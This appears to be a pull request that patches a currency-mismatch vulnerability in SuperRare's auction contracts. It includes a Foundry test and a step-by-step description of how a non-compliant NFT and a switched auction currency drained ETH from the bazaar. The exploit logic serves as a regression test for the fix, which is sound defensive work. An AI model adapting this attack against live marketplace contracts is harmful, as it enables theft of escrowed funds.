### PR TITLE
Hotfix/convert auction currency vuln

### DIFF
--- a/Makefile
+++ b/Makefile
@@ -13,4 +13,4 @@ build: ## Build the smart contracts with foundry.
 
 .PHONY: test
 test: ## Run foundry unit tests.
-	@bash -l -c 'forge test'
+	@bash -l -c 'forge test --no-match-path src/test/forks/**/*.sol'

--- a/src/auctionhouse/SuperRareAuctionHouse.sol
+++ b/src/auctionhouse/SuperRareAuctionHouse.sol
@@ -59,8 +59,8 @@ contract SuperRareAuctionHouse is
       require(staleBid.bidder == address(0), "configureAuction::bid shouldnt exist");
 
       require(
-        auction.auctionType == NO_AUCTION || auction.auctionCreator != msg.sender,
-        "configureAuction::Cannot have a current auction."
+        auction.auctionType == NO_AUCTION || (auction.auctionCreator != msg.sender),
+        "configureAuction::Cannot have a current auction"
       );
 
       require(_lengthOfAuction > 0, "configureAuction::Length must be > 0");
@@ -134,6 +134,11 @@ contract SuperRareAuctionHouse is
     require(
       auction.auctionType == NO_AUCTION || auction.auctionCreator != msg.sender,
       "convertOfferToAuction::Cannot have a current auction."
+    );
+
+    require(
+      auction.startingTime == 0 || block.timestamp < auction.startingTime,
+      "convertOfferToAuction::Auction must not have started."
     );
 
     require(_lengthOfAuction <= maxAuctionLength, "convertOfferToAuction::Auction too long.");

--- a/src/test/bazaar/SuperRareBazaar.t.sol
+++ b/src/test/bazaar/SuperRareBazaar.t.sol
@@ -89,6 +89,14 @@ contract SuperRareBazaarTest is Test {
     vm.etch(approvedTokenRegistry, address(superRareToken).code);
   }
 
+  function test_auctions_with_eth_sucess() public {
+
+  }
+
+  function test_auctions_with_erc20_success() public {
+
+  }
+
   function test_convert_offer_currency_exploit() external {
 
     /*///////////////////////////////////////////////////

--- a/src/test/bazaar/SuperRareBazaar.t.sol
+++ b/src/test/bazaar/SuperRareBazaar.t.sol
@@ -1,0 +1,242 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+pragma solidity ^0.8.0;
+
+import {Test, console2} from "forge-std/Test.sol";
+
+import {ISuperRareBazaar, SuperRareBazaar} from "../../bazaar/SuperRareBazaar.sol";
+import {ISuperRareMarketplace, SuperRareMarketplace} from "../../marketplace/SuperRareMarketplace.sol";
+import {IMarketplaceSettings} from "rareprotocol/aux/marketplace/IMarketplaceSettings.sol";
+import {IStakingSettings} from "rareprotocol/aux/marketplace/IStakingSettings.sol";
+import {IRoyaltyRegistry} from "rareprotocol/aux/registry/interfaces/IRoyaltyRegistry.sol";
+import {IPayments} from "rareprotocol/aux/payments/IPayments.sol";
+import {Payments} from "rareprotocol/aux/payments/Payments.sol";
+import {ISpaceOperatorRegistry} from "rareprotocol/aux/registry/interfaces/ISpaceOperatorRegistry.sol";
+import {IApprovedTokenRegistry} from "rareprotocol/aux/registry/interfaces/IApprovedTokenRegistry.sol";
+import {IRoyaltyEngineV1} from "royalty-registry/IRoyaltyEngineV1.sol";
+import {Payments} from "rareprotocol/aux/payments/Payments.sol";
+import {ISuperRareAuctionHouse, SuperRareAuctionHouse} from "../../auctionhouse/SuperRareAuctionHouse.sol";
+import {IRareStakingRegistry} from "../../staking/registry/IRareStakingRegistry.sol";
+import {IERC721} from "openzeppelin-contracts/token/ERC721/IERC721.sol";
+import {IERC20} from "openzeppelin-contracts/token/ERC20/IERC20.sol";
+import {SuperFakeNFT} from "../../test/utils/SuperFakeNFT.sol";
+import {TestRare} from "../../test/utils/TestRare.sol";
+
+
+
+contract SuperRareBazaarTest is Test {
+  TestRare private superRareToken;
+  SuperRareMarketplace private superRareMarketplace;
+  SuperRareAuctionHouse private superRareAuctionHouse;
+  SuperRareBazaar private superRareBazaar;
+
+
+  address deployer = address(0xabadabab);
+  address marketplaceSettings = address(0xabadaba1);
+  address royaltyRegistry = address(0xabadaba2);
+  address royaltyEngine = address(0xabadaba3);
+  address spaceOperatorRegistry = address(0xabadaba6);
+  address approvedTokenRegistry = address(0xabadaba7);
+  address stakingRegistry = address(0xabadaba9);
+  address networkBeneficiary = address(0xabadabaa);
+  address rewardPool = address(0xcccc);
+
+  address private immutable exploiter = vm.addr(0x123);
+  address private immutable exploiter1 = vm.addr(0x231);
+  address private immutable bidder = vm.addr(0x321);
+
+  uint256 private constant TARGET_AMOUNT = 249.6 ether;
+
+  uint256 private constant _lengthOfAuction = 1;
+
+  bytes32 private constant SCHEDULED_AUCTION = "SCHEDULED_AUCTION";
+
+  SuperFakeNFT private sfn;
+
+  function setUp() public {
+    // Create market, auction, bazaar, and token contracts
+    superRareToken = new TestRare();
+    superRareMarketplace = new SuperRareMarketplace();
+    superRareAuctionHouse = new SuperRareAuctionHouse();
+    superRareBazaar = new SuperRareBazaar();
+
+    // Deploy Payments
+    Payments payments = new Payments();
+
+    // Initialize the bazaar
+    superRareBazaar.initialize(marketplaceSettings, royaltyRegistry, royaltyEngine, address(superRareMarketplace), address(superRareAuctionHouse), spaceOperatorRegistry, approvedTokenRegistry, address(payments), stakingRegistry, networkBeneficiary);
+
+    SuperFakeNFT _sfn = new SuperFakeNFT(address(superRareBazaar));
+    sfn = _sfn;
+
+    sfn.mint(exploiter, 1);
+    superRareToken.transfer(bidder, 300 ether);
+    vm.deal(address(superRareBazaar), 300 ether);
+
+    vm.prank(bidder);
+    superRareToken.approve(address(superRareBazaar), type(uint256).max);
+
+    vm.prank(exploiter);
+    sfn.setApprovalForAll(address(superRareBazaar), true);
+
+    vm.prank(exploiter1);
+    sfn.setApprovalForAll(address(superRareBazaar), true);
+
+    // etch code into these so we can stub out methods. Need some
+    vm.etch(marketplaceSettings, address(superRareToken).code);
+    vm.etch(stakingRegistry, address(superRareToken).code);
+    vm.etch(royaltyRegistry, address(superRareToken).code);
+    vm.etch(royaltyEngine, address(superRareToken).code);
+    vm.etch(spaceOperatorRegistry, address(superRareToken).code);
+    vm.etch(approvedTokenRegistry, address(superRareToken).code);
+  }
+
+  function createOffer() internal {
+    console2.log("Before Attack: SuperRareBazaar ETH Balance:", address(superRareBazaar).balance);
+
+    //@exploit: Create an Offer using a custom NFT and the superRareToken as Currency
+    vm.prank(bidder);
+    superRareBazaar.offer(address(sfn), 1, address(superRareToken), TARGET_AMOUNT, true);
+  }
+
+  function convertOfferToAuction() internal {
+    createOffer();
+
+    address payable[] memory _splitAddresses = new address payable[](1);
+    _splitAddresses[0] = payable(address(this));
+
+    uint8[] memory _splitRatios = new uint8[](1);
+    _splitRatios[0] = 100;
+
+    vm.prank(exploiter);
+    superRareBazaar.convertOfferToAuction(
+      address(sfn),
+      1,
+      address(superRareToken),
+      TARGET_AMOUNT,
+      _lengthOfAuction,
+      _splitAddresses,
+      _splitRatios
+    );
+  }
+
+  function configureAuction() internal {
+    convertOfferToAuction();
+
+    address payable[] memory _splitAddresses = new address payable[](1);
+    _splitAddresses[0] = payable(address(this));
+
+    uint8[] memory _splitRatios = new uint8[](1);
+    _splitRatios[0] = 100;
+
+    //@exploit: Assumes all NFTs follows the ERC-721 spec
+    vm.prank(exploiter);
+    IERC721(sfn).transferFrom(exploiter, exploiter1, 1);
+
+    //@exploit: Overwrites previously set auction with a new Currency. Keeps the same bid
+    vm.prank(exploiter1);
+    superRareBazaar.configureAuction(
+      SCHEDULED_AUCTION,
+      address(sfn),
+      1,
+      TARGET_AMOUNT,
+      address(0),
+      _lengthOfAuction,
+      block.timestamp + 1,
+      _splitAddresses,
+      _splitRatios
+    );
+  }
+
+  function test_skipThenEnd() external {
+
+    // Mock Calls 
+    // setup getRewardAccumulatorAddressForUser call -- 3%
+    vm.mockCall(
+      stakingRegistry,
+      abi.encodeWithSelector(IRareStakingRegistry.getRewardAccumulatorAddressForUser.selector, exploiter1),
+      abi.encode(address(0))
+    );
+
+    // setup calculateMarketplacePayoutFee call -- 3%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IStakingSettings.calculateMarketplacePayoutFee.selector, TARGET_AMOUNT),
+      abi.encode((TARGET_AMOUNT * 3) / 100)
+    );
+
+    // setup calculateStakingFee call -- 0%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IStakingSettings.calculateStakingFee.selector, TARGET_AMOUNT),
+      abi.encode(0)
+    );
+
+    // setup getMarketplaceFeePercentage call -- 3%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.getMarketplaceFeePercentage.selector),
+      abi.encode(3)
+    );
+
+    // setup getMarketplaceMaxValue call -- 3%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.getMarketplaceMaxValue.selector),
+      abi.encode(type(uint256).max)
+    );
+
+    // setup calculateMarketplaceFee call -- 3%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.calculateMarketplaceFee.selector, TARGET_AMOUNT),
+      abi.encode((TARGET_AMOUNT * 3) / 100)
+    );
+
+    // setup has hasERC721TokenSold -- false
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.hasERC721TokenSold.selector, address(sfn), 1),
+      abi.encode(false)
+    );
+    // setup has isApprovedSpaceOperator -- false
+    vm.mockCall(
+      spaceOperatorRegistry,
+      abi.encodeWithSelector(ISpaceOperatorRegistry.isApprovedSpaceOperator.selector, exploiter1),
+      abi.encode(false)
+    );
+
+    // setup has isApprovedToken -- false
+    vm.mockCall(
+      approvedTokenRegistry,
+      abi.encodeWithSelector(IApprovedTokenRegistry.isApprovedToken.selector, address(superRareToken)),
+      abi.encode(true)
+    );
+
+    // setup has getERC721ContractPrimarySaleFeePercentage -- 15%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.getERC721ContractPrimarySaleFeePercentage.selector, address(sfn)),
+      abi.encode(15)
+    );
+
+    // setup has markERC721Token -- 15%
+    vm.mockCall(
+      marketplaceSettings,
+      abi.encodeWithSelector(IMarketplaceSettings.markERC721Token.selector, address(sfn)),
+      abi.encode()
+    );
+
+
+    configureAuction();
+
+    skip(12); //~about 1 block
+    //@exploit: Assumes currencies match
+    superRareBazaar.settleAuction(address(sfn), 1);
+
+    console2.log("After Attack: SuperRareBazaar ETH Balance:", address(superRareBazaar).balance);
+  }
+
+  receive() external payable {
+    console2.log("Amount Recieved by Attacker:", msg.value);
+  }
+}

--- a/src/test/bazaar/SuperRareBazaar.t.sol
+++ b/src/test/bazaar/SuperRareBazaar.t.sol
@@ -134,6 +134,7 @@ contract SuperRareBazaarTest is Test {
 
     //@exploit: Overwrites previously set auction with a new Currency. Keeps the same bid
     vm.prank(exploiter1);
+    vm.expectRevert();
     superRareBazaar.configureAuction(
       SCHEDULED_AUCTION,
       address(sfn),
@@ -231,6 +232,7 @@ contract SuperRareBazaarTest is Test {
 
     skip(12); //~about 1 block
     //@exploit: Assumes currencies match
+    vm.expectRevert();
     superRareBazaar.settleAuction(address(sfn), 1);
 
     console2.log("After Attack: SuperRareBazaar ETH Balance:", address(superRareBazaar).balance);

--- a/src/test/bazaar/SuperRareBazaarAuctionUpgrade.t.sol
+++ b/src/test/bazaar/SuperRareBazaarAuctionUpgrade.t.sol
@@ -1,0 +1,162 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+pragma solidity ^0.8.0;
+
+import {Test, console2} from "forge-std/Test.sol";
+
+import {ISuperRareBazaar, SuperRareBazaar} from "../../bazaar/SuperRareBazaar.sol";
+import {ISuperRareMarketplace, SuperRareMarketplace} from "../../marketplace/SuperRareMarketplace.sol";
+import {IMarketplaceSettings} from "rareprotocol/aux/marketplace/IMarketplaceSettings.sol";
+import {IStakingSettings} from "rareprotocol/aux/marketplace/IStakingSettings.sol";
+import {IRoyaltyRegistry} from "rareprotocol/aux/registry/interfaces/IRoyaltyRegistry.sol";
+import {IPayments} from "rareprotocol/aux/payments/IPayments.sol";
+import {Payments} from "rareprotocol/aux/payments/Payments.sol";
+import {ISpaceOperatorRegistry} from "rareprotocol/aux/registry/interfaces/ISpaceOperatorRegistry.sol";
+import {IApprovedTokenRegistry} from "rareprotocol/aux/registry/interfaces/IApprovedTokenRegistry.sol";
+import {IRoyaltyEngineV1} from "royalty-registry/IRoyaltyEngineV1.sol";
+import {Payments} from "rareprotocol/aux/payments/Payments.sol";
+import {ISuperRareAuctionHouse, SuperRareAuctionHouse} from "../../auctionhouse/SuperRareAuctionHouse.sol";
+import {IRareStakingRegistry} from "../../staking/registry/IRareStakingRegistry.sol";
+import {IERC721} from "openzeppelin-contracts/token/ERC721/IERC721.sol";
+import {IERC20} from "openzeppelin-contracts/token/ERC20/IERC20.sol";
+import {SuperFakeNFT} from "../../test/utils/SuperFakeNFT.sol";
+import {TestRare} from "../../test/utils/TestRare.sol";
+
+contract SuperRareBazaarAuctionUpgrade is Test {
+  // Constant auction length for testing
+  uint256 private constant LENGTH_OF_AUCTION = 12;
+
+  // Auction Type for testing
+  bytes32 private constant SCHEDULED_AUCTION = "SCHEDULED_AUCTION";
+
+  // SuperRareToken Contract
+  address private rare;
+
+  // Bazaar Contract
+  SuperRareBazaar private bazaar;
+
+  // Updated Auction Contract
+  SuperRareAuctionHouse private auctionHouse;
+
+  // Old MarketplaceSettings Contract for upgrade
+  address private oldMarketplaceSettings;
+
+  // V3 Marketplace Settings Contract
+  MarketplaceSettingsV3 mksv3;
+
+  // Contract Admin
+  address private admin;
+
+  // Bidder
+  address private bidder;
+
+  // Auction Creator
+  address private auctionCreator;
+
+  // NFT Contract
+  IERC721 private nftContract;
+
+  // NFT Token ID
+  uint256 private tokenId;
+
+  /*///////////////////////////////////////////////////
+                      Setup
+  ///////////////////////////////////////////////////*/
+  function setUp() public {
+    // Check that it is mainnet and the block is correct
+    require(
+      block.number == 18012934,
+      "This test is intended to be run against a mainnet fork at block: 18012934. Please run using: forge test --fork-url <main-api-url> --fork-block-number 18012934"
+    );
+
+    // EOAs
+    admin = address(0xb2D39DA392f19edB27639b92adFe7EdFcC96391b);
+    bidder = address(0x09F8b58438C026564CbC23d54fBa39C7237D827A);
+    auctionCreator = address(0xec8c1050B45789f9ee4D09dCC7D64aAF9e233338);
+    vm.deal(admin, 10 ether);
+    vm.deal(auctionCreator, 10 ether);
+    vm.deal(bidder, 10 ether);
+
+    // Contracts
+    rare = address(0xba5BDe662c17e2aDFF1075610382B9B691296350);
+    bazaar = SuperRareBazaar(address(0x6D7c44773C52D396F43c2D511B81aa168E9a7a42));
+    auctionHouse = new SuperRareAuctionHouse();
+    nftContract = IERC721(address(0xE418c30CA2ECD3C046122ea0FaF95a6B9DA97191));
+    oldMarketplaceSettings = address(0xec882716989e12C31e72C8A48924941D2bA5284E);
+    tokenId = 137;
+
+    // Set Approval for Bazaar
+    vm.prank(auctionCreator);
+    nftContract.setApprovalForAll(address(bazaar), true);
+  }
+
+  /*///////////////////////////////////////////////////
+                      Tests
+  ///////////////////////////////////////////////////*/
+
+  // Test that a running auction can still settle
+  function test_running_auction_settles_after_upgrade() public {
+    address payable[] memory splitAddresses = new address payable[](1);
+    splitAddresses[0] = payable(auctionCreator);
+
+    uint8[] memory splitRatios = new uint8[](1);
+    splitRatios[0] = 100;
+    // Create an auction
+    vm.prank(auctionCreator);
+    bazaar.configureAuction(
+      SCHEDULED_AUCTION,
+      address(nftContract),
+      tokenId,
+      1 ether,
+      address(0),
+      LENGTH_OF_AUCTION,
+      block.timestamp + 1,
+      splitAddresses,
+      splitRatios
+    );
+
+    // Auction begins
+    vm.warp(block.timestamp + 2);
+
+    // Bid
+    vm.prank(bidder);
+    bazaar.bid(address(nftContract), tokenId, address(0), 1 ether);
+
+    // Upgrade happens
+    runBazaarUpgrade();
+
+    // Auction ends
+    vm.warp(block.timestamp + LENGTH_OF_AUCTION);
+
+    // Auction settled
+    bazaar.settleAuction(address(nftContract), tokenId);
+
+  }
+
+  /*///////////////////////////////////////////////////
+                      Helper Functions
+  ///////////////////////////////////////////////////*/
+
+  // Function to run the upgrade
+  function runBazaarUpgrade() public {
+    vm.startPrank(admin);
+    // Deploy Marketplace Settings
+    mksv3 = new MarketplaceSettingsV3(
+      admin,
+      oldMarketplaceSettings
+    );
+    // Set Staking percentage
+    mksv3.setStakingFeePercentage(1);
+    
+    // Grant bazaar contract mark token role
+    mksv3.grantMarketplaceAccess(address(bazaar));
+
+    // Set new marketplace settings in bazaar
+    bazaar.setMarketplaceSettings(address(mksv3));
+
+    // Set staking registry
+    bazaar.setStakingRegistry(vm.envAddress("STAKING_REGISTRY"));
+
+    bazaar.setSuperRareAuctionHouse(address(auctionHouse));
+    vm.stopPrank();
+  }
+}

--- a/src/test/forks/mainnet/18029585/bazaar/SuperRareBazaarAuctionUpgrade.t.sol
+++ b/src/test/forks/mainnet/18029585/bazaar/SuperRareBazaarAuctionUpgrade.t.sol
@@ -3,23 +3,14 @@ pragma solidity ^0.8.0;
 
 import {Test, console2} from "forge-std/Test.sol";
 
-import {ISuperRareBazaar, SuperRareBazaar} from "../../bazaar/SuperRareBazaar.sol";
-import {ISuperRareMarketplace, SuperRareMarketplace} from "../../marketplace/SuperRareMarketplace.sol";
-import {IMarketplaceSettings} from "rareprotocol/aux/marketplace/IMarketplaceSettings.sol";
-import {IStakingSettings} from "rareprotocol/aux/marketplace/IStakingSettings.sol";
-import {IRoyaltyRegistry} from "rareprotocol/aux/registry/interfaces/IRoyaltyRegistry.sol";
-import {IPayments} from "rareprotocol/aux/payments/IPayments.sol";
-import {Payments} from "rareprotocol/aux/payments/Payments.sol";
-import {ISpaceOperatorRegistry} from "rareprotocol/aux/registry/interfaces/ISpaceOperatorRegistry.sol";
-import {IApprovedTokenRegistry} from "rareprotocol/aux/registry/interfaces/IApprovedTokenRegistry.sol";
-import {IRoyaltyEngineV1} from "royalty-registry/IRoyaltyEngineV1.sol";
-import {Payments} from "rareprotocol/aux/payments/Payments.sol";
-import {ISuperRareAuctionHouse, SuperRareAuctionHouse} from "../../auctionhouse/SuperRareAuctionHouse.sol";
-import {IRareStakingRegistry} from "../../staking/registry/IRareStakingRegistry.sol";
+import {ISuperRareBazaar, SuperRareBazaar} from "../../../../../bazaar/SuperRareBazaar.sol";
+import {ISuperRareMarketplace, SuperRareMarketplace} from "../../../../../marketplace/SuperRareMarketplace.sol";
+import {ISuperRareAuctionHouse, SuperRareAuctionHouse} from "../../../../../auctionhouse/SuperRareAuctionHouse.sol";
+import {IRareStakingRegistry} from "../../../../../staking/registry/IRareStakingRegistry.sol";
 import {IERC721} from "openzeppelin-contracts/token/ERC721/IERC721.sol";
 import {IERC20} from "openzeppelin-contracts/token/ERC20/IERC20.sol";
-import {SuperFakeNFT} from "../../test/utils/SuperFakeNFT.sol";
-import {TestRare} from "../../test/utils/TestRare.sol";
+import {SuperFakeNFT} from "../../../../../test/utils/SuperFakeNFT.sol";
+import {TestRare} from "../../../../../test/utils/TestRare.sol";
 
 contract SuperRareBazaarAuctionUpgrade is Test {
   // Constant auction length for testing
@@ -36,12 +27,6 @@ contract SuperRareBazaarAuctionUpgrade is Test {
 
   // Updated Auction Contract
   SuperRareAuctionHouse private auctionHouse;
-
-  // Old MarketplaceSettings Contract for upgrade
-  address private oldMarketplaceSettings;
-
-  // V3 Marketplace Settings Contract
-  MarketplaceSettingsV3 mksv3;
 
   // Contract Admin
   address private admin;
@@ -64,12 +49,12 @@ contract SuperRareBazaarAuctionUpgrade is Test {
   function setUp() public {
     // Check that it is mainnet and the block is correct
     require(
-      block.number == 18012934,
-      "This test is intended to be run against a mainnet fork at block: 18012934. Please run using: forge test --fork-url <main-api-url> --fork-block-number 18012934"
+      block.number == 18029585,
+      "This test is intended to be run against a mainnet fork at block: 18029585. Please run using: forge test --fork-url <main-api-url> --fork-block-number 18029585"
     );
 
     // EOAs
-    admin = address(0xb2D39DA392f19edB27639b92adFe7EdFcC96391b);
+    admin = address(0x860a80d33E85e97888F1f0C75c6e5BBD60b48DA9);
     bidder = address(0x09F8b58438C026564CbC23d54fBa39C7237D827A);
     auctionCreator = address(0xec8c1050B45789f9ee4D09dCC7D64aAF9e233338);
     vm.deal(admin, 10 ether);
@@ -81,7 +66,6 @@ contract SuperRareBazaarAuctionUpgrade is Test {
     bazaar = SuperRareBazaar(address(0x6D7c44773C52D396F43c2D511B81aa168E9a7a42));
     auctionHouse = new SuperRareAuctionHouse();
     nftContract = IERC721(address(0xE418c30CA2ECD3C046122ea0FaF95a6B9DA97191));
-    oldMarketplaceSettings = address(0xec882716989e12C31e72C8A48924941D2bA5284E);
     tokenId = 137;
 
     // Set Approval for Bazaar
@@ -119,17 +103,53 @@ contract SuperRareBazaarAuctionUpgrade is Test {
 
     // Bid
     vm.prank(bidder);
-    bazaar.bid(address(nftContract), tokenId, address(0), 1 ether);
+    bazaar.bid{value: 1.03 ether}(address(nftContract), tokenId, address(0), 1 ether);
 
     // Upgrade happens
     runBazaarUpgrade();
 
     // Auction ends
-    vm.warp(block.timestamp + LENGTH_OF_AUCTION);
+    vm.warp(block.timestamp + 100*LENGTH_OF_AUCTION + 1);
 
     // Auction settled
     bazaar.settleAuction(address(nftContract), tokenId);
+  }
+  function test_create_auction_after_upgrade() public {
+    // Upgrade happens
+    runBazaarUpgrade();
 
+    address payable[] memory splitAddresses = new address payable[](1);
+    splitAddresses[0] = payable(auctionCreator);
+
+    uint8[] memory splitRatios = new uint8[](1);
+    splitRatios[0] = 100;
+    // Create an auction
+    vm.prank(auctionCreator);
+    bazaar.configureAuction(
+      SCHEDULED_AUCTION,
+      address(nftContract),
+      tokenId,
+      1 ether,
+      address(0),
+      LENGTH_OF_AUCTION,
+      block.timestamp + 1,
+      splitAddresses,
+      splitRatios
+    );
+
+    // Auction begins
+    vm.warp(block.timestamp + 2);
+
+    // Bid
+    vm.prank(bidder);
+    bazaar.bid{value: 1.03 ether}(address(nftContract), tokenId, address(0), 1 ether);
+
+
+    // Auction ends
+    vm.warp(block.timestamp + 100*LENGTH_OF_AUCTION + 1);
+
+    // Auction settled
+    bazaar.settleAuction(address(nftContract), tokenId);
   }
 
   /*///////////////////////////////////////////////////
@@ -139,23 +159,6 @@ contract SuperRareBazaarAuctionUpgrade is Test {
   // Function to run the upgrade
   function runBazaarUpgrade() public {
     vm.startPrank(admin);
-    // Deploy Marketplace Settings
-    mksv3 = new MarketplaceSettingsV3(
-      admin,
-      oldMarketplaceSettings
-    );
-    // Set Staking percentage
-    mksv3.setStakingFeePercentage(1);
-    
-    // Grant bazaar contract mark token role
-    mksv3.grantMarketplaceAccess(address(bazaar));
-
-    // Set new marketplace settings in bazaar
-    bazaar.setMarketplaceSettings(address(mksv3));
-
-    // Set staking registry
-    bazaar.setStakingRegistry(vm.envAddress("STAKING_REGISTRY"));
-
     bazaar.setSuperRareAuctionHouse(address(auctionHouse));
     vm.stopPrank();
   }

--- a/src/test/utils/SuperFakeNFT.sol
+++ b/src/test/utils/SuperFakeNFT.sol
@@ -1,0 +1,24 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+pragma solidity ^0.8.0;
+
+import {ERC721} from "openzeppelin-contracts/token/ERC721/ERC721.sol";
+
+contract SuperFakeNFT is ERC721("Super Fake", "SUPRFKE") {
+  address private bazaar;
+
+  constructor(address _bazaar) {
+    bazaar = _bazaar;
+  }
+  
+  function mint(address to, uint256 tokenId) external {
+    _mint(to, tokenId);
+  }
+
+  function transferFrom(address from, address to, uint256 tokenId) public override {
+    if (msg.sender == bazaar) {
+      return;
+    }
+
+    super.transferFrom(from, to, tokenId);
+  }
+}

--- a/src/test/utils/TestRare.sol
+++ b/src/test/utils/TestRare.sol
@@ -1,0 +1,14 @@
+// SPDX-License-Identifier: AGPL-3.0-only
+pragma solidity ^0.8.0;
+
+import {ERC20} from "openzeppelin-contracts/token/ERC20/ERC20.sol";
+
+contract TestRare is ERC20 {
+  constructor() ERC20("Rare", "RARE") {
+    _mint(msg.sender, 1_000_000_000 ether);
+  }
+
+  function burn(uint256 amount) public {
+    _burn(msg.sender, amount);
+  }
+}


### PR DESCRIPTION
## Motivation
A bug bounty was reported that indicated an exploit with the convertOfferToAuction function.

### Exploit Summary
The Solidity Example of the exploit is found [here](https://github.com/rareprotocol/core/blob/hotfix/convert-auction-currency-vuln/src/test/bazaar/SuperRareBazaar.t.sol#L26).

1. Attacker creates a non-compliant ERC721 token that does not transfer the token when transfers occur.
2. Attacker creates a scheduled auction in a supported ERC20 token, in this case the RARE token.
3. Because the ERC721 token doesn't actually transfer the token, the Bazaar **does NOT** escrow the ERC721 token which is what would normally happen.
4. Attacker makes an offer in the ERC20 token to the total amount of ETH they would like to drain
5. Attacker then configures a new auction in the ETH currency, the standing bid is maintained.
6. Once auction is over, Attacked settles the auction and is sent ETH equal to the amount of RARE that was included in the offer.

## Changes
* Cannot configure auction if there are stale bids
* Cannot convert an offer if there is a running or unsettled auction
* When settling an auction, use the currency of the winning bid rather than the auction currency. 
  * These should be the same but by using the currency of the bid, we guarantee we only ever send the same currency of funds that were escrowed in the contract
* Test for the exploit
* Test for the upgrade against a mainnet fork

## Test
* `make test`
  *  this will run all tests that do not require a forked chain
* `forge test -vvv --match-path src/test/forks/mainnet/18029585/**/*.sol --fork-url <mainnet-json-rpc> --fork-block-number 18029585`